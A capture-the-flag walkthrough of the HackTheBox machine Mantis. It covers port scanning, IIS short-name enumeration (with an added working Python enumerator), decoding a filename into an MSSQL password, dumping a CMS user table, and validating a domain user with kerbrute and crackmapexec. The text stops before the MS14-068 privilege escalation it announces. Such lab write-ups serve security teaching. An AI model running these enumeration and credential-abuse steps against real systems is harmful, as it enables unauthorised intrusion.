Mantis
Mantis was one of those Windows targets where it's just a ton of enumeration until you get a SYSTEM shell. The exploit is MS14-068, a Kerberos KDC flaw that let any low-privilege domain user forge a ticket carrying privileged group membership.
- Nmap
- Recon: IIS short-name disclosure on port 1337, and an encoded filename that hides the MSSQL password
- SQL credentials: the Orchard user table gives the domain user james in plaintext
- ms14-068.py / goldenPac.py: from a low-privilege domain user to NT AUTHORITY\SYSTEM by forging a privileged Kerberos ticket
Nmap
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-23 02:25:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
| ms-sql-info:
| 10.129.167.60:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2021-07-22T22:26:38-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-23T02:26:42z
|_ start_date: 2021-07-23T02:24:20
PORT STATE SERVICE VERSION
1337/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after: 2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-23T02:24:48
|_Not valid after: 2051-07-23T02:24:48
|_ssl-date: 2021-07-23T02:30:39+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.129.167.60:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
We have a good number of ports open: DNS, Kerberos, LDAP and SMB (this is a domain controller), two IIS sites on 8080 and 1337, and SQL Server 2014 on 1433. Let's enumerate and gather as much information as possible.
Port 53
dig @10.129.167.60 -x 10.129.167.60
No PTR records. Let’s skip this for now.
Ports 135, 139, 445 (RPC/SMB): enumerate with enum4linux
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 23 09:42:29 2021
==========================
| Target Information |
==========================
Target ........... 10.129.167.60
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.129.167.60 |
=====================================================
[E] Can;t find workgroup/domain
=============================================
| Nbtstat Information for 10.129.167.60 |
=============================================
Looking up status of 10.129.167.60
No reply from 10.129.167.60
======================================
| Session Check on 10.129.167.60 |
======================================
[+] Server 10.129.167.60 allows sessions using username '', password ''
[+] Got domain/workgroup name:
============================================
| Getting domain SID for 10.129.167.60 |
============================================
Domain Name: HTB
Domain Sid: S-1-5-21-4220043660-4019079961-2895681657
[+] Host is part of a domain (not a workgroup)
=======================================
| OS information on 10.129.167.60 |
=======================================
[+] Got OS info for 10.129.167.60 from smbclient:
[+] Got OS info for 10.129.167.60 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
==============================
| Users on 10.129.167.60 |
==============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==========================================
| Share Enumeration on 10.129.167.60 |
==========================================
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.129.167.60
=====================================================
| Password Policy Information for 10.129.167.60 |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.129.167.60 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.167.60)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
===============================
| Groups on 10.129.167.60 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 10.129.167.60 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================================
| Getting printer info for 10.129.167.60 |
==============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Fri Jul 23 09:43:19 2021
$ crackmapexec smb 10.129.167.60 -u "" -p "" --shares
SMB 10.129.167.60 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.167.60 445 MANTIS [-] htb.local\: STATUS_ACCESS_DENIED
SMB 10.129.167.60 445 MANTIS [-] Error enumerating shares: STATUS_ACCESS_DENIED
The server accepts a null session, but every useful query (srvsvc, SAMR user listing, RID cycling, share listing) comes back STATUS_ACCESS_DENIED, so anonymous enumeration yields only the domain name and SID. We need a valid domain user to get the details.
$ ldapsearch -h 10.129.167.60 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
We have a domain, htb.local. Let's add it to our /etc/hosts file.
$ ldapsearch -h 10.129.167.60 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
currentTime: 20210723041730.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=MANTIS,CN=Servers,CN=Default-First-Site-Nam
e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 127061
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: mantis.htb.local
ldapServiceName: htb.local:mantis$@HTB.LOCAL
serverName: CN=MANTIS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
The rootDSE also gives the DC's hostname, mantis.htb.local (dnsHostName), and the Kerberos realm HTB.LOCAL (ldapServiceName). Let's save mantis.htb.local in /etc/hosts too; the Kerberos tooling later needs to reach the KDC by that name.
Port 1337
Let's brute-force directories on the second IIS site.
$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://htb.local:1337/FUZZ -e aspx,asp
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://htb.local:1337/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Extensions : aspx asp
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
aspnet_client [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 166ms]
[Status: 200, Size: 689, Words: 25, Lines: 32, Duration: 165ms]
:: Progress: [79752/79752] :: Job [1/1] :: 232 req/sec :: Duration: [0:05:35] :: Errors: 6 ::
Only aspnet_client turned up. IIS 7.5 is a candidate for the short-name (8.3 "tilde") disclosure, where requests like /SECURE*~1*/a.aspx answer differently depending on whether a matching 8.3 name exists, so the first six characters of file and directory names can be recovered one character at a time. Let's check with IIS-ShortName-Scanner.
$ java -jar iis_shortname_scanner.jar 2 20 http://htb.local:1337/
magicFileName: *~1*
requestMethodDelimiter: ,
requestMethod: DEBUG,OPTIONS,GET,POST,HEAD,TRACE
nameStartsWith:
extStartsWith:
hassleFree: true
cookies: IIS_Tilde_Scanner=1;
outputFile: iis_shortname_scanner_logfile.txt
acceptableDifferenceLengthBetweenResponses: 10
proxyServerPort:
magicFinalPartList: \a.aspx,\a.asp,/a.aspx,/a.asp,/a.shtml,/a.asmx,/a.ashx,/a.config,/a.php,/a.jpg,/webresource.axd,/a.xxx
headersDelimiter: @@
saveOutput: false
maxNumericalPart: 3
headers: X-Forwarded-For: 127.0.0.1@@X-Originating-IP: 127.0.0.1@@X-Cluster-Client-Ip: 127.0.0.1
useProvidedURLWithoutChange: false
debug: false
maxConnectionTimeOut: 20000
magicFinalPartDelimiter: ,
forceNumericalPart: 1
userAgent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
inScopeCharacters: ETAONRISHDLFCMUGYPWBVKJXQZ0123456789_-$~()&!#%'@^`{}
asteriskSymbol: *
showActualNames: true
maxRetryTimes: 10
maxDelayAfterEachRequest: 1
magicFileExtension: *
URLSuffix: ?&aspxerrorpath=/
questionMarkSymbol: ?
-- Current Configuration -- Begin
Scan Mode: ALL
Number of threads: 20
Config file: config.xml
Scanner version: 2.3.9 (05 February 2017)
-- Current Configuration -- End
Max delay after each request in milliseconds = 1
No proxy has been used.
Scanning...
Testing request method: "DEBUG" with magic part: "\a.aspx" ...
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by IISShortNameScanner.IIS_ShortName_Scanner (file:/opt/tools/IIS-ShortName-Scanner/iis_shortname_scanner.jar) to field java.net.HttpURLConnection.method
WARNING: Please consider reporting this to the maintainers of IISShortNameScanner.IIS_ShortName_Scanner
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Testing request method: "OPTIONS" with magic part: "\a.aspx" ...
Dir: ASPNET~1
Dir: SECURE~1
[-] SECURU
# IIS Short Name (8.3) Scanner version 2.3.9 (05 February 2017) - scan initiated 2021/07/23 11:55:07
Target: http://htb.local:1337/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): \a.aspx
|_ Extra information:
|_ Number of sent requests: 268
|_ Identified directories: 2
|_ ASPNET~1
|_ SECURE~1
|_ Indentified files: 0
Finished in: 19 second(s)
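How the tilde scan above actually works, as an added example that is not the scanner's code: the server's status code is the whole oracle, so the enumeration is a character-by-character walk over the 8.3 alphabet. The fetch callable is injected; make_fake_iis is a constructed stand-in for a vulnerable IIS 7.5 webroot holding exactly the two names the scan found, so the block runs offline. Against a live host, fetch would wrap urllib.request and return the HTTP status; the real scanner also rotates request methods and magic suffixes, which this example does not.

```python
# Added example: minimal IIS 8.3 short-name (tilde) enumeration.
# Not the IIS-ShortName-Scanner code; the fake server is constructed for the demo.
import fnmatch
import string
from typing import Callable, List, Set

ALPHABET = string.ascii_uppercase + string.digits + "_-"

# On a vulnerable IIS, a wildcard path that matches an existing 8.3 name yields
# 404 (file not found inside an existing directory) while a non-matching one
# yields 400 (invalid path). That status difference is the oracle.
MATCH, NO_MATCH = 404, 400


def probe(base: str, pattern: str) -> str:
    """Build the probe URL; the /a.aspx suffix hands the path to ASP.NET."""
    return f"{base.rstrip('/')}/{pattern}/a.aspx"


def enumerate_short_names(base: str, fetch: Callable[[str], int],
                          max_stem: int = 6, alphabet: str = ALPHABET) -> List[str]:
    """Recover 8.3 stems one character at a time using fetch(url) -> status."""
    found: List[str] = []

    def walk(stem: str) -> None:
        # <stem>~1* with no wildcard before the tilde matches only a complete name.
        if stem and fetch(probe(base, f"{stem}~1*")) == MATCH:
            found.append(f"{stem}~1")
        if len(stem) >= max_stem:        # 8.3 stems are at most six characters
            return
        for ch in alphabet:
            if fetch(probe(base, f"{stem}{ch}*~1*")) == MATCH:
                walk(stem + ch)

    walk("")
    return sorted(found)


def make_fake_iis(short_names: Set[str], base: str) -> Callable[[str], int]:
    """Constructed stand-in for a vulnerable IIS webroot (offline demo only)."""
    def fetch(url: str) -> int:
        pattern = url[len(base.rstrip("/")) + 1:].rsplit("/a.aspx", 1)[0]
        hit = any(fnmatch.fnmatchcase(name, pattern) for name in short_names)
        return MATCH if hit else NO_MATCH
    return fetch


def demo() -> List[str]:
    base = "http://htb.local:1337"
    fetch = make_fake_iis({"ASPNET~1", "SECURE~1"}, base)   # mirrors the scan result
    return enumerate_short_names(base, fetch)


if __name__ == "__main__":
    print(demo())   # ['ASPNET~1', 'SECURE~1']
```

The stem check (`SECURE~1*`) and the prefix check (`SECU*~1*`) are different questions, which is why both probes are needed; a name shorter than six characters is reported as soon as its stem is complete.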
The scanner only recovers the first six characters of the 8.3 name, so there is a directory whose name starts with SECURE. Filter a wordlist down to such candidates and fuzz with those:
$ grep -E "\bsecure" /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt > secure.txt
$ ffuf -w secure.txt -u http://htb.local:1337/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://htb.local:1337/FUZZ
:: Wordlist : FUZZ: secure.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
secure_notes [Status: 301, Size: 158, Words: 9, Lines: 2, Duration: 328ms]
:: Progress: [391/391] :: Job [1/1] :: 227 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
We have a directory named secure_notes. Let's access it and check.
Inside it is a file whose name carries what looks like an encoded token rather than a random hash:
http://htb.local:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
Token: NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx
The character set (mixed-case letters and digits, length a multiple of 4) says base64, so decode that first:
echo -n "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx" | base64 -d
6d2424716c5f53405f504073735730726421
$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 6d2424716c5f53405f504073735730726421
Not Found.
--------------------------------------------------
$ echo -n "6d2424716c5f53405f504073735730726421" | wc -c
36
Not a hash: 36 hex characters is not the length of any common digest (MD5 is 32, SHA-1 is 40). It is the hex encoding of an 18-byte string, so decode it as raw hex instead:
$ echo -n "6d2424716c5f53405f504073735730726421" | xxd -r -p
m$$ql_S@_P@ssW0rd!
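The same two steps done programmatically, as an added example that is not part of the original write-up: a small decoder that peels hex and base64 layers off a token until the result stops being printable ASCII, so the guessing the write-up describes happens in code. The URL and token are the ones from the page; the layer-detection rules (hex tried before base64, roll back on unprintable output) are this example's own.

```python
# Added example (not from the original write-up): peel the layers off the
# secure_notes filename automatically instead of guessing by hand.
import base64
import binascii
import re
from typing import List, Tuple

# The URL from the write-up; the token sits between dev_notes_ and .txt
DEV_NOTES_URL = ("http://htb.local:1337/secure_notes/"
                 "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt")

HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def extract_token(url: str) -> str:
    """Pull the encoded part out of a dev_notes_<token>.txt... filename."""
    m = re.search(r"dev_notes_([A-Za-z0-9+/=]+)\.txt", url)
    if not m:
        raise ValueError("no dev_notes token in URL")
    return m.group(1)


def _printable(data: bytes) -> bool:
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def decode_layers(token: str, max_depth: int = 5) -> Tuple[str, List[str]]:
    """Repeatedly undo hex or base64 while the result is still printable ASCII.

    Hex is tried first because every hex string is also valid base64 text;
    a decode whose output is not printable is rolled back and the loop stops.
    Returns (plaintext, layers removed, outermost first).
    """
    data = token.encode("ascii")
    layers: List[str] = []
    for _ in range(max_depth):
        text = data.decode("ascii")
        candidate, name = None, ""
        if len(text) % 2 == 0 and HEX_RE.fullmatch(text):
            candidate, name = binascii.unhexlify(text), "hex"
        elif B64_RE.fullmatch(text):
            padded = text + "=" * (-len(text) % 4)     # tolerate stripped padding
            try:
                candidate, name = base64.b64decode(padded, validate=True), "base64"
            except binascii.Error:
                candidate = None
        if candidate is None or not _printable(candidate):
            break                                      # final layer (or a false positive)
        data, layers = candidate, layers + [name]
    return data.decode("ascii"), layers


if __name__ == "__main__":
    plaintext, layers = decode_layers(extract_token(DEV_NOTES_URL))
    print(" -> ".join(layers), ":", plaintext)   # base64 -> hex : m$$ql_S@_P@ssW0rd!
```

The printable check is what keeps a plaintext that happens to look like hex (for example "deadbeef") from being mangled: the decode runs, produces binary, and is rolled back.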
That reads as a password for the MSSQL service (m$$ql), but there is no username with it, so let's see where the password can be used.
Port 8080
The credentials did not work on the Orchard blog login.
Port 1433
SQL Server on 1433 accepts the password for the SQL login admin:
$ impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!'@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL> select name from master.sys.databases;
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
SQL>
orcharddb is the only non-default database (Orchard is the CMS behind the blog on 8080). Let's list its tables.
SQL> select table_name from orcharddb.information_schema.tables
table_name
--------------------------------------------------------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord
There is a user table, blog_Orchard_Users_UserPartRecord.
SQL> select username,password from orcharddb.dbo.blog_Orchard_Users_UserPartRecord
username password
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
The admin password is stored as an Orchard hash, but james's is in plaintext:
User: james
Pass: J@m3s_P@ssW0rd!
Let's make a note of the user in users.txt and the password in passwords.txt.
Let's check whether james is a domain account. kerbrute does this with Kerberos pre-authentication, which tells valid usernames from invalid ones without trying a password:
$ /opt/tools/kerbrute userenum users.txt --dc htb.local -d htb.local
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/23/21 - Ronnie Flathers @ropnop
2021/07/23 13:40:21 > Using KDC(s):
2021/07/23 13:40:21 > htb.local:88
2021/07/23 13:40:21 > [+] VALID USERNAME: james@htb.local
2021/07/23 13:40:21 > Done! Tested 2 usernames (1 valid) in 0.191 seconds
james is a valid user in htb.local. Now test the password over SMB and list the shares:
$ crackmapexec smb htb.local -u users.txt -p passwords.txt --shares
SMB 10.129.167.60 445 MANTIS [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.167.60 445 MANTIS [+] htb.local\james:J@m3s_P@ssW0rd!
SMB 10.129.167.60 445 MANTIS [+] Enumerated shares
SMB 10.129.167.60 445 MANTIS Share Permissions Remark
SMB 10.129.167.60 445 MANTIS ----- ----------- ------
